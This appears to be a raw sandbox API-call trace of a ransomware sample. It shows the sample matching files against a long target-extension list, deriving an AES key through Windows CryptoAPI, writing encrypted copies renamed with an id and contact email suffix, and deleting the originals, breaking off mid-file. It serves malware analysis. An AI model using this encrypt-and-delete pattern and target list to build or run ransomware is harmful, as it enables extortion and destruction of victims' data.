	[0172.596] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.596] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.596] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.596] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.599] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x1988, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x1988, lpOverlapped=0x0) returned 1
	[0172.604] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.605] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0172.607] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.607] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.607] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.607] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.607] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.607] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb93f0) returned 1
	[0172.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.608] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x1988, dwBufLen=0x1988 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x1990) returned 1
	[0172.608] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.608] RtlMoveMemory (in: Destination=0xfdfb18, Source=0xfde188, Length=0x1988 | out: Destination=0xfdfb18) 
	[0172.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.608] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdfb18*, pdwDataLen=0x18a1ec*=0x1988, dwBufLen=0x1990 | out: pbData=0xfdfb18*, pdwDataLen=0x18a1ec*=0x1990) returned 1
	[0172.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.609] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0172.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.610] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0172.610] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.610] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0172.610] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.610] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.611] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.612] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0172.612] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.613] WriteFile (in: hFile=0x39c, lpBuffer=0xfdfb18*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdfb18*, lpNumberOfBytesWritten=0x18a648*=0x1990, lpOverlapped=0x0) returned 1
	[0172.615] CloseHandle (hObject=0x39c) returned 1
	[0172.617] CloseHandle (hObject=0x390) returned 1
	[0172.617] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml")) returned 1
	[0172.621] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml")) returned 0
	[0172.621] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0172.621] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0172.621] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0172.621] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\"
	[0172.621] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml"
	[0172.621] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml") returned 100
	[0172.622] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.622] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml") returned 0x64
	[0172.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.622] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"
	[0172.622] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml") returned 100
	[0172.622] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.623] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.623] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.623] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.624] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.624] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.624] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0172.627] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.628] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb440) returned 1
	[0172.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.630] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.630] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
